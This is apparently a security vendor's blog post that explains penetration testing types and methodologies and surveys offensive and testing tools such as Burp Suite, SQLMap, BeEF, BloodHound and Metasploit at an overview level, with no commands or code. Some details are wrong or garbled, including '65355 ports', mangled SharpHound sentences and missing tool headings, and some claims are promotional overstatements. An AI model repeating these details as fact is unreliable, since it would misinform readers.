In recent times when data breaches and cyber attacks have become so common, being cyber resilient and prepared for attacks is the new norm.
Organisations need to protect their data and assets while maintaining the privacy of their employees and customers. This is only possible when organisations take appropriate measures and penetration testing tools to analyse and improve their current security posture and invest in their cyber security.
Robert Mueller (FBI Director, 2012) has rightly said, “There are only two types of companies: Those that have been hacked and those that will be. Even that is merging into one category: those that have been hacked, and will be again.”
In the light of the above statement, it is evident that cybercriminals will stop at nothing to intrude on your networks, compromise systems and exfiltrate data.
Many companies (just like Cyphere) are providing security solutions and services to other organisations, helping them improve their current state of cyber security processes. For example, Penetration Testing services (or pentesting, in short) to assess and analyse risks to the assets.
What is penetration testing?
Penetration testing (or pentesting) is a simulated cyberattack where hackers (ethical, of course) are hired to identify vulnerabilities and carry out the same attacks as an actual cyber attacker would upon identification of those vulnerabilities.
Often, these engagements will have a set of objectives used to determine the difference between a successful pen test and an unsuccessful one. Based on different assets, pen testing may vary in the cloud i.e. GCP pentesting, on-premises or various asset categories such as web applications, APIs, thick clients, mobile devices.
Why do you need penetration testing?
The main objective of carrying out a penetration test is to identify weaknesses and vulnerabilities in applications, networks and systems and then patch them accordingly before a real cyber-attack happens.
What are the types of penetration testing?
Penetration testing is usually categorised into three types. Those being:
1. Black box testing
In this type of testing, only the scope is given to the security analyst, and no knowledge of the infrastructure, applications, credentials etc., is provided.
2. White box testing
In this testing, the security analyst is given insight into the infrastructure, applications, programming languages, credentials etc.
3. Gray box testing
In this type of pentest, partial knowledge about the infrastructure and assets and the scope is provided to the security analyst.
A pentest may also be carried out according to the following two types:
1. Internal pentesting
Depending on the criticality and the confidentiality of the organisational assets, organisations may ask for an internal pentesting, where the internal networks and internal (or in-house developed) applications are provided to the penetration tester to be tested. For instance, to test container security controls, testing within the private cloud assets owned by a customer is tested during this engagement.
2. External pentesting
In this type of penetration test, the penetration tester is provided with the public-facing assets of an organisation and is asked to carry out his pentesting activities. This includes checking for ports such as scanning ports 443, 25, 80, etc. (all 65355 ports effectively), fingerprinting, vulnerability scanning and analysis and pen test (assessing and carrying out any exploitable risks).
What are the top 5 penetration testing techniques?
Around the globe, all penetration testing activities revolve around the following five techniques or methodologies:
1. Open Source Security Testing Methodology Manual (OSSTMM)
OSSTMM is a standardised method for penetration testing, regardless of which network security firm they employ.
2. Open Web Application Security Project (OWASP)
OWASP is an open-source, community-driven effort focused on improved web applications and services security, although mobile, API and secure coding practices have also been included in it.
3. National Institute of Standards and Technology (NIST)
NIST Special Publications 800 Series is an information security standard developed by NIST. The SP 800-115 special publication describes the general penetration testing procedure and provides recommendations for analysing the test results and developing measures to reduce risk.
4. Penetration Testing Execution Standard (PTES)
PTES offers recommendations for performing a basic pentest and several more advanced test variants for organisations with advanced security requirements. One of the advantages of PTES is that it gave a detailed description of the goals and expected results of a pentest.
5. Information System Security Assessment Framework (ISSAF)
ISSAF describes the appropriate pen-testing tools, how to use them, and what results testers can expect under various circumstances.
What is needed for Pentesting? What makes a good pen tester?
A good penetration tester has a curious mindset, is tech-savvy and has a deep love and passion for the field of information security itself. Plus, they should know-how applications and operating systems should have good networking concepts and overall IT and computer science knowledge.
Penetration testing tools
While in the above section, we discussed what penetration testing is and why it is essential, in this part, we will discuss a few penetration testing tools that are known and used worldwide, and all excellent and aspiring penetration testers must know how to use this penetration testing tool to their fullest potential.
We will not be going deep into the functionality of the discussed tools, just an overall tool review and its features. For physical security, you can look at physical security attack methods and tools here.
Operating systems as tools for penetration testing
1. Kali Linux
The most popular OS used for penetration testing is Kali Linux. Developed and maintained by Offensive Security, Kali Linux is a Linux-based OS with almost all the tools and resources required by penetration testers to carry out their penetration testing activities.
It contains many tools categorised according to the penetration testing techniques, for example, reconnaissance, scanning, exploitation etc.
It contains pentesting tools and wordlists for brute-forcing and fuzzing applications for valid credentials or breaking the applications to cause unintended behaviour.
Anyone proficient in Linux utilises Kali Linux as the first go-to operating system when doing a penetration test.
2. Parrot OS
Developed by ParrotSec, Parrot OS is another Linux-based operating system for penetration testers containing most of the tools and resources required by pentesters. It is lighter in size and requires fewer resources than Kali Linux.
As for the tools, it has almost all the tools included in Kali and some additional.
3. Commando VM
Developed and maintained by FireEye, Commando VM, as its name suggests, is a virtual machine based on the Windows operating system used for offensive security operations. It doesn’t support Mac OS X.
Command VM is more focused on the Red Teaming part of pentesting than conventional pentesting and has the tools required by a Red Teamer to carry out red team activities successfully.
Commando VM tools include Powershell-based Active Directory and Azure Active Directory reconnaissance, enumeration and exploitation tools, antivirus evasion tools and scripts and much more.
The complete list of tools included in the Commando VM and the installation instructions can be found here.
4. Android Tamer
Android tamer is yet another Linux-based pentesting operating system, but for android applications. It has all the necessary tools and resources required to test an android application for vulnerabilities, decompile it and look through the code for any misconfigurations, sensitive data exposure etc.
Android Tamer allows security professionals to work on many android security-related tasks ranging from Malware Analysis, Penetration Testing and Reverse Engineering.
Web penetration testing tools
5. Netsparker web vulnerability scanner
Netsparker is a Dynamic Application Security Testing (DAST) tool that scans and penetration tests web applications for vulnerabilities, misconfigurations or missing updates and patches and generates an excellent comprehensive report.
It also includes Interactive Application Security Testing (IAST), making it a versatile vulnerability scanner.
Netsparker can identify almost all OWASP’s top 10 web and API vulnerabilities.
It is straightforward to set up and configure and is a paid pen-testing tool with two editions; (i) Netsparker Standard – a standalone Windows application, and (ii) Netsparker Enterprise – which is a network-based application for teams and multiple users.
6. Acunetix web vulnerability scanner
Acunetix is a fully automated web vulnerability scanner that detects and reports many web application vulnerabilities, including all variants of SQL Injection and cross-site scripting (XSS).
It complements the role of a penetration tester by automating tasks that can take hours to test manually, delivering accurate results with very few false positives at top speed.
It includes advanced manual tools for penetration testers and integrates with popular Issue Trackers and WAFs.
It is Fast & Scalable and can crawl hundreds of thousands of pages without interruptions. It integrates with popular WAFs and Issue Trackers to aid the SDLC and is available both as an on-prem and cloud-based solution.
Most websites and web applications on the internet are developed using WordPress. WordPress offers a basic site layout and many themes and plugins for additional functionality and customisation of the website.
Naturally, these themes and plugins have vulnerabilities within them. Hence WPScan is a pen-testing tool to scan and test a WordPress site for vulnerabilities.
It can detect old and vulnerable plugins, themes, backup or configuration files that may have been left accessible on the public internet by mistake and gives you a very friendly and comprehensive overview of your WordPress website’s current security state.
It comes pre-installed in Kali Linux and is a free-to-use vulnerability scanner with a deficient number of false positives.
Developed by VegaBird Technologies, Vooki is yet another Dynamic Application Security Testing (DAST) tool that is capable of scanning both web applications and REST APIs for vulnerabilities and generates a comprehensive report based on the findings.
It is capable of performing more than 7000 security checks, making it one of the top-notch tools.
It is a freemium penetration testing tool with both free and paid versions. While the free version is limited to 3500 security checks, it still is a good vulnerability scanner with a meagre false-positive ratio.
It also includes a proxy capable of intercepting web traffic and modifying requests sent to the web application to perform manual testing.
9. Burp suite
When talking about web vulnerabilities, the most famous name in the entire web pentesting market is the Portswigger Burp Suite.
Burp Suite is a proxy that intercepts web application traffic and can modify the request sent to and the response received from the application to test for multiple web vulnerabilities and issues.
While it is used for manual testing, it includes plugins that can be used to automate tasks and perform some testing automatically, making the job of a pentester a bit easier.
It has a meager ratio of false positives and includes various features such as replaying requests, brute-forcing and fuzzing and detecting cryptographic issues.
It also includes a built-in browser, so almost no configuration is required at the user-end.
Burp Suite is also a free, freemium tool, with its community edition free, while the Pro version costs 399$ per year.
Discuss your concerns today
10. OWASP zed attack proxy (ZAP)
The open-source web application scanner is OWASP’s Zed Attack Proxy (or ZAP).
OWASP ZAP is a web proxy with similar features to the burp suite. It is also completely free and open-source, making it a more accessible and cheaper pen-testing tool to deploy at a larger scale.
When it comes to testing and exploiting SQL injection vulnerabilities, SQLMap is probably the best pen testing tool out there.
It can test for almost all the variants of SQL injections and exploit and exfiltrate data out of the databases upon successfully exploiting the SQL injection vulnerability.
In addition to SQL injection, it includes several Web Application Firewall (WAF) bypasses and is an entirely free-to-use tool.
A very loud and open source web vulnerability scanner capable of performing comprehensive tests against web servers for multiple items, including more than 6500 potentially dangerous files and programs, checks for outdated versions of servers, version-specific problems on over 270 servers, and some misconfiguration checks as well.
It is best to test web servers for missing patches, misconfigurations and exposed files and test the IDS/IPS and an organisation’s SOC/SIEM that they are working fine and generating alerts accordingly.
13. Browser exploitation framework
The Browser Exploitation Framework (BeEF) is a pentesting framework focusing on client-side attacks, explicitly targeting users’ web browsers.
BeEF uses one or more web browsers to launch directed command modules and further attacks against the system from within the browser context.
Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors.
Network/Infrastructure penetration testing tools
14. Network mapper (Nmap/Zenmap)
When talking about penetration tests, the first and the most popular pen testing tool that comes into mind is the Network mapper (or Nmap, for short).
Nmap started as a port scanner but is now a complete network scanner and also includes some scripts to test against some vulnerabilities, including those related to web applications.
It can detect open ports, the services running on those ports and their versions, the target operating system, etc.
The thing that makes Nmap stand out from the rest of the network and ports scanners is its scripting engine, appropriately called Nmap Scripting Engine.
NSE includes a large number of scripts that are used to test the open ports and the services detected for vulnerabilities, and in some cases even exploit those vulnerabilities, for example, exploit SQL injection in an open MySQL port on a system.
A wireless (or WiFi) security pentesting framework capable of cracking flaws within wireless connections by capturing data packets for an effective protocol in exporting through text files for analysis.
It focuses on different areas of WiFi security:
- Monitoring: Packet capture and exports data to text files for further processing by third-party tools.
- They were attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
- Testing: Checking WiFi cards and driver capabilities.
- Cracking: WEP and WPA-PSK.
As an infrastructure auditing tool, pentesters use Nessus to check the overall security posture of a network, web application or system and look for low-hanging fruits.
It has a very large database of vulnerabilities that gets updated very frequently.
It includes a port-scanner capable of service and version detection, a plugin for scanning a web application for potential vulnerabilities, takes in various application and system configuration files, tells you of misconfiguration, etc.
It is also a freemium tool, Nessus Essentials being the free version, while the paid version is the Nessus Professional.
The network communication and packet analysing tool are popular for providing minor details about your network protocols, packet information, cryptographic techniques, etc.
Wireshark is extremely useful in checking for network cryptographic issues and carrying out MiTM attacks as a part of a reconnaissance activity during a red team operation.
It is capable of intercepting wire traffic and wireless traffic and hence is a robust network identification, enumeration and recon tool.
BloodHound uses graphs to map out the Active Directory environment and then helps identify various attack paths to move laterally within the domain or escalate privileges.
The data is fed into the BloodHound’s database using data collectors, or Investors referred to as SharpHound. A sharp sound data collector is run in an Active Directory domain, and the result is a ZIP file that contains all the information about the domain.
The ZIP is then fed (or uploaded) to BloodHound GUI, and a nice and comprehensive map of the entire AD domain is presented before us.
Both red teams and blue teams can use BloodHound. Red teams use BloodHound to map out the domain environment, identify high-value targets, check for AD misconfigurations and identify potential attack paths.
While blue teams can also use BloodHound to figure out those attack paths and implement a suitable fix.
Penetration testing frameworks
19. Metasploit framework
If you are looking for a complete and absolute penetration testing framework, then the Metasploit Framework by Rapid7 is your only choice.
It comes with a variety of exploits, tools, scanners and payloads. The Metasploit Framework is the only complete penetration testing framework that is widely used all over the world.
Whether it’s a web vulnerability scanner, a network enumerator, exploiting a vulnerability, getting command execution, or generating payloads, the Metasploit Framework automates all these tasks for you.
Discuss your concerns today
While it includes many pre-built exploit codes in itself, you can even provide it with your custom exploit codes.
Metasploit framework is a complete pentesting framework incorporating all the phases of hacking, right from the beginning (reconnaissance) to the post-exploitation and action-on-objectives phase.
20. Mobile security framework (MobSF)
Just like the Metasploit framework, the Mobile Security Framework (or MobSF) is an all-in-all mobile testing framework supporting both Android (APK) and iOS (IPA) applications, as well as zipped source code.
It is an open-source framework capable of performing end-to-end security testing, malware analysis and static and dynamic testing of mobile applications.
It can also generate reports that can be exported in PDF format for review outside of the application or shared with other teams. These reports will contain information on everything from if a file is securely signed and how that was done to the functionality that the application will utilise once installed on a device.